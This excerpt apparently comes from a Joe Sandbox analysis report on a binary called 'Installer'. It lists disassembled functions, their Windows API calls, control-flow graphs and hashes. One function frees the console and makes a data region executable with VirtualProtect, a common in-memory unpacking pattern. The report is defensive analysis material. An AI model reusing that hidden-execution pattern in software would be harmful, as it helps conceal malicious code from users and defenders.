                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                                    • Opcode ID: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
                                                                                                                                                                                                                                                    • Instruction ID: b625be1e48f712ee84b018ff9c3f3d4fb87f9ac7a8671f9ac160f1f809bd0e52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F15D75A006148FCB15CF68C494BADBBF1FF89324F198269E819AF3A1D734AD45CB90
                                                                                                                                                                                                                                                    Function 00355349 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 211 355349-355354 212 355356-355369 call 3576e4 call 357dcf 211->212 213 35536a-35537d call 3553da 211->213 219 35537f-35539c CreateThread 213->219 220 3553ab 213->220 222 35539e-3553aa GetLastError call 35770a 219->222 223 3553ba-3553bf 219->223 224 3553ad-3553b9 call 35542a 220->224 222->220 225 3553c6-3553ca 223->225 226 3553c1-3553c4 223->226 225->224 226->225
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00355392
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00342513,00000000,00000000), ref: 0035539E
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003553A5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744730728-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c99d49529a3bcfb818fe5a5c096705d4b2a107e668ff2d2892371778c6e7329
                                                                                                                                                                                                                                                    • Instruction ID: 51200e127d9a59d3b2cb019620444210284cc305e891e306595191c84559498d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c99d49529a3bcfb818fe5a5c096705d4b2a107e668ff2d2892371778c6e7329
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4019276501619EBDF179FA0DC26EAE3B68FF00392F114058FC0596160EBB0E944DB50
                                                                                                                                                                                                                                                    Function 003554EE Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 231 3554ee-3554fb call 35c2bb 234 3554fd-355505 231->234 235 35553b-35553e ExitThread 231->235 234->235 236 355507-35550b 234->236 237 355512-355518 236->237 238 35550d call 35ce1b 236->238 240 355525-35552b 237->240 241 35551a-35551c 237->241 238->237 240->235 243 35552d-35552f 240->243 241->240 242 35551e-35551f CloseHandle 241->242 242->240 243->235 244 355531-355535 FreeLibraryAndExitThread 243->244 244->235
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C2BB: GetLastError.KERNEL32(00000000,?,003576E9,0035D306,?,?,0035C1B7,00000001,00000364,?,00000006,000000FF,?,00355495,00378E38,0000000C), ref: 0035C2BF
                                                                                                                                                                                                                                                      • Part of subcall function 0035C2BB: SetLastError.KERNEL32(00000000), ref: 0035C361
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,003553D9,?,?,003554CE,00000000), ref: 0035551F
                                                                                                                                                                                                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,003553D9,?,?,003554CE,00000000), ref: 00355535
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0035553E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1991824761-0
                                                                                                                                                                                                                                                    • Opcode ID: cc527fdc779240c44b05aec372e4b894cf9385f8792070b41b9bbc265583774d
                                                                                                                                                                                                                                                    • Instruction ID: 3b94d71c2e412fbcd7040ae1c774d58fa221bb031bcdb9214b2b1a7ced47f1cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc527fdc779240c44b05aec372e4b894cf9385f8792070b41b9bbc265583774d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF05470100F016BDB335B759829E1A3A9AAF02372F0A4E14FC6BC70B0EB20FD4A8750
                                                                                                                                                                                                                                                    Function 0035565F Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,00355721,00358396,00358396,?,00000002,C82EE5EC,00358396,00000002), ref: 00355670
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00355721,00358396,00358396,?,00000002,C82EE5EC,00358396,00000002), ref: 00355677
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00355689
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: 2596ef31b60383bf4fd2a7475b69e6462586a0d04a7186fc048fbc009a1f8bd3
                                                                                                                                                                                                                                                    • Instruction ID: 03369a2be18cfcd9381881408e383489d69e5718647646e87afa105af105483e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2596ef31b60383bf4fd2a7475b69e6462586a0d04a7186fc048fbc009a1f8bd3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D06C31000A49ABCF232F61DC6ED993F2AEB40382B445414B9494A072DF32A99ADA84
                                                                                                                                                                                                                                                    Function 00363BF4 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 352 363bf4-363c16 353 363c1c-363c1e 352->353 354 363e09 352->354 356 363c20-363c3f call 357f78 353->356 357 363c4a-363c6d 353->357 355 363e0b-363e0f 354->355 365 363c42-363c45 356->365 359 363c73-363c79 357->359 360 363c6f-363c71 357->360 359->356 361 363c7b-363c8c 359->361 360->359 360->361 363 363c8e-363c9c call 3629a2 361->363 364 363c9f-363caf call 363f21 361->364 363->364 370 363cb1-363cb7 364->370 371 363cf8-363d0a 364->371 365->355 374 363ce0-363cf6 call 363f9e 370->374 375 363cb9-363cbc 370->375 372 363d61-363d81 WriteFile 371->372 373 363d0c-363d12 371->373 376 363d83-363d89 GetLastError 372->376 377 363d8c 372->377 379 363d14-363d17 373->379 380 363d4d-363d5a call 3643cd 373->380 390 363cd9-363cdb 374->390 381 363cc7-363cd6 call 364365 375->381 382 363cbe-363cc1 375->382 376->377 384 363d8f-363d9a 377->384 385 363d39-363d4b call 364591 379->385 386 363d19-363d1c 379->386 397 363d5f 380->397 381->390 382->381 387 363da1-363da4 382->387 391 363e04-363e07 384->391 392 363d9c-363d9f 384->392 402 363d34-363d37 385->402 393 363da7-363da9 386->393 394 363d22-363d2f call 3644a8 386->394 387->393 390->384 391->355 392->387 398 363dd7-363de3 393->398 399 363dab-363db0 393->399 394->402 397->402 405 363de5-363deb 398->405 406 363ded-363dff 398->406 403 363db2-363dc4 399->403 404 363dc9-363dd2 call 357770 399->404 402->390 403->365 404->365 405->354 405->406 406->365
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00363F9E: GetConsoleOutputCP.KERNEL32(C82EE5EC,00000000,00000000,?), ref: 00364001
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00358584,?), ref: 00363D79
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00358584,?,003587C8,00000000,?,00000000,003587C8,?,?,?,00378FE8,0000002C,003586B4,?), ref: 00363D83
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2915228174-0
                                                                                                                                                                                                                                                    • Opcode ID: 8bf33df3fa841ecf0a11a716be97971b174dd86e9e03761365b8b4e07dc71598
                                                                                                                                                                                                                                                    • Instruction ID: 0ab693587cca71e286d1066c0d2717cbdd61bda59628905626234ee1ec1366e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bf33df3fa841ecf0a11a716be97971b174dd86e9e03761365b8b4e07dc71598
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C61B371D04159AFDF12CFA8C885AEEBFB9AF49304F158145F805BB25AD732DA11CBA0
                                                                                                                                                                                                                                                    Function 003643CD Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 409 3643cd-364422 call 350050 412 364497-3644a7 call 34a6e1 409->412 413 364424 409->413 414 36442a 413->414 416 364430-364432 414->416 418 364434-364439 416->418 419 36444c-364471 WriteFile 416->419 420 364442-36444a 418->420 421 36443b-364441 418->421 422 364473-36447e 419->422 423 36448f-364495 GetLastError 419->423 420->416 420->419 421->420 422->412 424 364480-36448b 422->424 423->412 424->414 425 36448d 424->425 425->412
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00363D5F,00000000,003587C8,?,00000000,?,00000000), ref: 00364469
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00363D5F,00000000,003587C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00358584), ref: 0036448F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                                                                                                                    • Opcode ID: 89ca9217b7ee1c6fa7047c44eca2a03d94fa7119329201123250df3b896bcd29
                                                                                                                                                                                                                                                    • Instruction ID: 14f344345e1d288c52e742b05c737fe0bd0c83ed6a2f678f42013065ba737822
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ca9217b7ee1c6fa7047c44eca2a03d94fa7119329201123250df3b896bcd29
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5721B130A002199FCB1BCF1ADC81AE9B7B9EF48305F1480A9E90AD7215DA30DD82CF60
                                                                                                                                                                                                                                                    Function 003490F0 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 426 3490f0-349130 call 34efc1 429 349136-34913d 426->429 430 3491c7-3491c9 call 34b317 426->430 431 349143-349149 429->431 432 3491ce-3491df call 34b317 429->432 430->432 434 349174-34919a call 34efd2 call 3492f0 431->434 435 34914b-349172 call 34efd2 431->435 442 34919f-3491b1 call 34a660 432->442 434->442 445 3491b6-3491c6 435->445 442->445
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 003491C9
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 003491D7
                                                                                                                                                                                                                                                      • Part of subcall function 0034EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00348E4A,0034A2F0), ref: 0034EFE7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3666349979-0
                                                                                                                                                                                                                                                    • Opcode ID: 6e2b041d3be4b1231d976d259902bcebb54f59d348c4d7720e36d1af65dba553
                                                                                                                                                                                                                                                    • Instruction ID: 70c9905e27413758a18d2c624953ff5f9706b9f0a95a55ceb11ba529c62ad223
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e2b041d3be4b1231d976d259902bcebb54f59d348c4d7720e36d1af65dba553
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB21F1B0A006469BEB119FA48D46BAEBBF4FB04320F144229E5296F381D734B904CBD2
                                                                                                                                                                                                                                                    Function 0035DA52 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 448 35da52-35da57 449 35da59-35da71 448->449 450 35da73-35da77 449->450 451 35da7f-35da88 449->451 450->451 452 35da79-35da7d 450->452 453 35da9a 451->453 454 35da8a-35da8d 451->454 455 35daf4-35daf8 452->455 458 35da9c-35daa9 GetStdHandle 453->458 456 35da96-35da98 454->456 457 35da8f-35da94 454->457 455->449 459 35dafe-35db01 455->459 456->458 457->458 460 35dad6-35dae8 458->460 461 35daab-35daad 458->461 460->455 463 35daea-35daed 460->463 461->460 462 35daaf-35dab8 GetFileType 461->462 462->460 464 35daba-35dac3 462->464 463->455 465 35dac5-35dac9 464->465 466 35dacb-35dace 464->466 465->455 466->455 467 35dad0-35dad4 466->467 467->455
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0035D941,00379330,0000000C), ref: 0035DA9E
                                                                                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0035D941,00379330,0000000C), ref: 0035DAB0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                                                                                                    • Opcode ID: eeefd7e55da57bf169e909af99b0d914a781cc8fc94672308386c1b8027e80b8
                                                                                                                                                                                                                                                    • Instruction ID: 133105d9b132bb52f2da6b2190e0962ad942cd63c88da87ee063a161593dd430
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eeefd7e55da57bf169e909af99b0d914a781cc8fc94672308386c1b8027e80b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B11DD7110C7424AC7328E3E8C88A237AA9AB56332B390759D8B7C65F5C670D88ED600
                                                                                                                                                                                                                                                    Function 00341EF0 Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00341240: _strlen.LIBCMT ref: 003412BA
                                                                                                                                                                                                                                                    • FreeConsole.KERNELBASE(?,?,?,?,?,0034173F,?,?,?,00000000,?), ref: 00341F21
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0037A011,00000549,00000040,?), ref: 00341F78
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1248733679-0
                                                                                                                                                                                                                                                    • Opcode ID: 8fe193ab96df858dbce68a84a7d1b868e96a39db6742d7dc037744015a8feaea
                                                                                                                                                                                                                                                    • Instruction ID: b42d6f718794b3efa8bc2a44722f0e5ff8fbf45f4a0a91c60fba1a325f3d89e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fe193ab96df858dbce68a84a7d1b868e96a39db6742d7dc037744015a8feaea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E11A371A405086BDB16BB65EC02EFF77B8EB84701F048829F608AB282E67569905BD1
                                                                                                                                                                                                                                                    Function 00355470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00378E38,0000000C), ref: 00355483
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0035548A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1611280651-0
                                                                                                                                                                                                                                                    • Opcode ID: cbbf5e5e24b7df3dfc4b62375458640a1b1458c293bee2e5665f6c7e2c3fbb31
